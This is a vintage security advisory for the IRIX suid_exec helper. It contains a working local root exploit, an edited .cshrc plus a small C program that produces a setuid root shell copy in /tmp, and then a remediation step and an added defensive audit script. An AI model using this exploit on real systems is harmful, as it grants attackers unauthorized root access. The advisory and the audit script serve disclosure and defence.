COMMAND

    /sbin/suid_exec

SYSTEMS AFFECTED

    IRIX 5.x.x, 6.0.x, 6.1, 6.2, 6.3, 6.4

PROBLEM

    By default all suid executable files on IRIX are ELF binaries, and
    when a shell tries to parse such a file all you get is errors.
    However, suid_exec takes the shell name from the SHELL environment
    variable. Moreover, it doesn't care what this shell may do, and it
    may do a lot of interesting things, like executing dot files. There
    are many ways to exploit it; to my taste the easiest is:

        % setenv | grep SHELL
        SHELL=/bin/tcsh
        % mv ~/.cshrc ~/.cshrc.old
        % cat > ~/.cshrc
        cp /bin/sh /tmp
        chmod a+rsx /tmp/sh
        ^D
        % cat > expl.c
        main()
        {
          execl("/sbin/suid_exec","/bin/su","/bin/su",0);
        }
        ^D
        % cc expl.c -o expl
        % ./expl
        Too many ('s.
        % ls -l /tmp/sh
        -r-sr-sr-x    1 root     sys       140784 Dec  2 19:21 /tmp/sh*

SOLUTION

    chmod -s /sbin/suid_exec (unless you  need ksh to execute suid  sh
    scripts).  The suid_exec  program is considered freeware  and will
    not be patched.  Freeware upgrades should be applied.
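
    An added audit sketch (not part of the original advisory) that checks
    whether the chmod -s above has been applied and looks for the artifact
    the demonstration leaves behind: a set-id copy of a shell in a scratch
    directory. The function names and the KNOWN_SHELLS list are assumptions
    introduced for this example.

```shell
#!/bin/sh
# Added audit example, not from the advisory. Every path is a parameter.

# Shells to compare against (assumed list); override via KNOWN_SHELLS.
KNOWN_SHELLS=${KNOWN_SHELLS:-"/bin/sh /bin/csh /bin/tcsh /bin/ksh"}

# helper_status PATH -> prints absent | clean | setid
# "setid" means the chmod -s from SOLUTION has not been applied.
helper_status() {
    if [ ! -e "$1" ]; then echo absent
    elif [ -u "$1" ] || [ -g "$1" ]; then echo setid
    else echo clean
    fi
}

# setid_files DIR -> lists regular files under DIR with setuid or setgid set
setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# shell_copy_of FILE -> prints the known shell FILE is identical to, else returns 1
shell_copy_of() {
    for s in $KNOWN_SHELLS; do
        if [ -f "$s" ] && cmp -s "$s" "$1"; then echo "$s"; return 0; fi
    done
    return 1
}

# findings HELPER DIR... -> one report line per problem found
findings() {
    helper=$1; shift
    [ "$(helper_status "$helper")" != setid ] ||
        echo "FINDING: $helper still has set-id bits"
    for d in "$@"; do
        setid_files "$d" | while IFS= read -r f; do
            orig=$(shell_copy_of "$f") || orig="no known shell"
            echo "FINDING: set-id file $f (identical to: $orig)"
        done
    done
}

# audit HELPER DIR... -> prints the findings; returns 1 if there are any
audit() {
    out=$(findings "$@")
    [ -z "$out" ] || { printf '%s\n' "$out"; return 1; }
}

# Example: sh audit.sh /sbin/suid_exec /tmp /var/tmp
[ $# -eq 0 ] || audit "$@"
```

    A non-zero exit status means at least one finding was printed, so the
    script can be run from cron or a host-audit job as is.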